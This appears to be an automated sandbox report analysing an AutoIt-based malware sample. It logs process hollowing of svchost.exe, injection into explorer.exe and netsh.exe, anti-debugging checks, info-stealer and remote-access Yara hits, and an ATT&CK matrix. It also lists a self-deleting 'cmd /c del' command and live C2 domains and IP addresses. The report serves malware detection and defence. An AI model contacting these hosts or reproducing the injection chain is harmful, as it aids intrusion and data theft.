          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD6A50 mov eax, dword ptr fs:[00000030h]1_2_02FD6A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03084BB0 mov eax, dword ptr fs:[00000030h]1_2_03084BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03084BB0 mov eax, dword ptr fs:[00000030h]1_2_03084BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF4A35 mov eax, dword ptr fs:[00000030h]1_2_02FF4A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF4A35 mov eax, dword ptr fs:[00000030h]1_2_02FF4A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEA2E mov eax, dword ptr fs:[00000030h]1_2_02FFEA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307EBD0 mov eax, dword ptr fs:[00000030h]1_2_0307EBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305CBF0 mov eax, dword ptr fs:[00000030h]1_2_0305CBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEBFC mov eax, dword ptr fs:[00000030h]1_2_02FFEBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8BF0 mov eax, dword ptr fs:[00000030h]1_2_02FD8BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8BF0 mov eax, dword ptr fs:[00000030h]1_2_02FD8BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8BF0 mov eax, dword ptr fs:[00000030h]1_2_02FD8BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305CA11 mov eax, dword ptr fs:[00000030h]1_2_0305CA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300CA24 mov eax, dword ptr fs:[00000030h]1_2_0300CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD0BCD mov eax, dword ptr fs:[00000030h]1_2_02FD0BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD0BCD mov eax, dword ptr fs:[00000030h]1_2_02FD0BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD0BCD mov eax, dword ptr fs:[00000030h]1_2_02FD0BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF0BCB mov eax, dword ptr fs:[00000030h]1_2_02FF0BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF0BCB mov eax, dword ptr fs:[00000030h]1_2_02FF0BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF0BCB mov eax, dword ptr fs:[00000030h]1_2_02FF0BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0BBE mov eax, dword ptr fs:[00000030h]1_2_02FE0BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0BBE mov eax, dword ptr fs:[00000030h]1_2_02FE0BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307EA60 mov eax, dword ptr fs:[00000030h]1_2_0307EA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300CA6F mov eax, dword ptr fs:[00000030h]1_2_0300CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300CA6F mov eax, dword ptr fs:[00000030h]1_2_0300CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300CA6F mov eax, dword ptr fs:[00000030h]1_2_0300CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304CA72 mov eax, dword ptr fs:[00000030h]1_2_0304CA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304CA72 mov eax, dword ptr fs:[00000030h]1_2_0304CA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCCB7E mov eax, dword ptr fs:[00000030h]1_2_02FCCB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4A80 mov eax, dword ptr fs:[00000030h]1_2_030A4A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008A90 mov edx, dword ptr fs:[00000030h]1_2_03008A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03026AA4 mov eax, dword ptr fs:[00000030h]1_2_03026AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC8B50 mov eax, dword ptr fs:[00000030h]1_2_02FC8B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03026ACC mov eax, dword ptr fs:[00000030h]1_2_03026ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03026ACC mov eax, dword ptr fs:[00000030h]1_2_03026ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03026ACC mov eax, dword ptr fs:[00000030h]1_2_03026ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004AD0 mov eax, dword ptr fs:[00000030h]1_2_03004AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004AD0 mov eax, dword ptr fs:[00000030h]1_2_03004AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEB20 mov eax, dword ptr fs:[00000030h]1_2_02FFEB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEB20 mov eax, dword ptr fs:[00000030h]1_2_02FFEB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300AAEE mov eax, dword ptr fs:[00000030h]1_2_0300AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300AAEE mov eax, dword ptr fs:[00000030h]1_2_0300AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E908 mov eax, dword ptr fs:[00000030h]1_2_0304E908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E908 mov eax, dword ptr fs:[00000030h]1_2_0304E908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C912 mov eax, dword ptr fs:[00000030h]1_2_0305C912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306892B mov eax, dword ptr fs:[00000030h]1_2_0306892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305892A mov eax, dword ptr fs:[00000030h]1_2_0305892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE8C0 mov eax, dword ptr fs:[00000030h]1_2_02FFE8C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050946 mov eax, dword ptr fs:[00000030h]1_2_03050946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4940 mov eax, dword ptr fs:[00000030h]1_2_030A4940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0301096E mov eax, dword ptr fs:[00000030h]1_2_0301096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0301096E mov edx, dword ptr fs:[00000030h]1_2_0301096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0301096E mov eax, dword ptr fs:[00000030h]1_2_0301096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C97C mov eax, dword ptr fs:[00000030h]1_2_0305C97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD0887 mov eax, dword ptr fs:[00000030h]1_2_02FD0887
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074978 mov eax, dword ptr fs:[00000030h]1_2_03074978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074978 mov eax, dword ptr fs:[00000030h]1_2_03074978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4859 mov eax, dword ptr fs:[00000030h]1_2_02FD4859
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD4859 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030589B3 mov esi, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030589B3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030589B3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE2840 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030669C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF2835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF2835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF2835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF2835 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF2835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF2835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030049D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0309A9D3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305E9E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030029F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030029F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305C810 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDA9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDA9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDA9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDA9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDA9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDA9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307483A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307483A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD09AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD09AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03000854 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03066870 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01000B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
          Source: C:\Windows\SysWOW64\svchost.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FC083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FC09D5 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FC0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_01569930 SetUnhandledExceptionFilter
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_015696E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Network Connect: 65.21.196.90 80
          Source: C:\Windows\explorer.exe | Network Connect: 66.235.200.145 80
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\netsh.exe | Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\svchost.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\svchost.exe | Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1560000
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 209008
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01001201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FE2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0100B226 SendInput,keybd_event
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0100E355 mouse_event
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8t1uarSZFV.exe"
          Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01000B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01001663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
          Source: 8t1uarSZFV.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: 8t1uarSZFV.exe, explorer.exe, 00000002.00000003.3113987697.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711530497.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.1710146437.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4144086937.00000000018A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.1709841681.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4143652285.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman$
          Source: explorer.exe, 00000002.00000000.1710146437.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4144086937.00000000018A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.1710146437.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4144086937.00000000018A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FC0698 cpuid
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01018195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FFD27A GetUserNameW
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FDBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

          Lowering of HIPS / PFW / Operating System Security Settings

          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

          Stealing of Sensitive Information

          Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: 8t1uarSZFV.exe | Binary or memory string: WIN_81
          Source: 8t1uarSZFV.exe | Binary or memory string: WIN_XP
          Source: 8t1uarSZFV.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: 8t1uarSZFV.exe | Binary or memory string: WIN_XPe
          Source: 8t1uarSZFV.exe | Binary or memory string: WIN_VISTA
          Source: 8t1uarSZFV.exe | Binary or memory string: WIN_7
          Source: 8t1uarSZFV.exe | Binary or memory string: WIN_8

          Remote Access Functionality

          Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01021204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01021806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
          MITRE ATT&CK Matrix, grouped by tactic column (leading numbers as given in the report):

          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
          Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
          Execution: 1 Native API; 1 Shared Modules; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
          Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
          Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 612 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At
          Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 12 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 612 Process Injection; HTML Smuggling
          Credential Access: 21 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
          Discovery: 2 System Time Discovery; 1 Account Discovery; 1 File and Directory Discovery; 215 System Information Discovery; 341 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
          Collection: 1 Archive Collected Data; 21 Input Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
          Command and Control: 2 Ingress Tool Transfer; 1 Encrypted Channel; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
          Behavior Graph ID: 1489361 | Sample: 8t1uarSZFV.exe | Startdate: 07/08/2024 | Architecture: WINDOWS | Score: 100

          Start node: www.crucka.xyz, www.00050591.xyz, 13 other IPs or domains; signatures: Multi AV Scanner detection for domain / URL, Found malware configuration, Malicious sample detected (through community Yara rule), 6 other signatures; www.00050591.xyz: Performs DNS queries to domains with low reputation
          • 8t1uarSZFV.exe (started): Binary is likely a compiled AutoIt script file, Found API chain indicative of sandbox detection, Writes to foreign memory regions, 2 other signatures
            • svchost.exe (started): Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Sample uses process hollowing technique, 3 other signatures
              • explorer.exe (injected): connects to 00050591.xyz 65.21.196.90 (ports 49736, 80; CP-ASDE, United States) and californiacurrentelectric.com 66.235.200.145 (ports 49738, 80; CLOUDFLARENETUS, United States); System process connects to network (likely due to code injection or exploit), Uses netsh to modify the Windows network and firewall settings
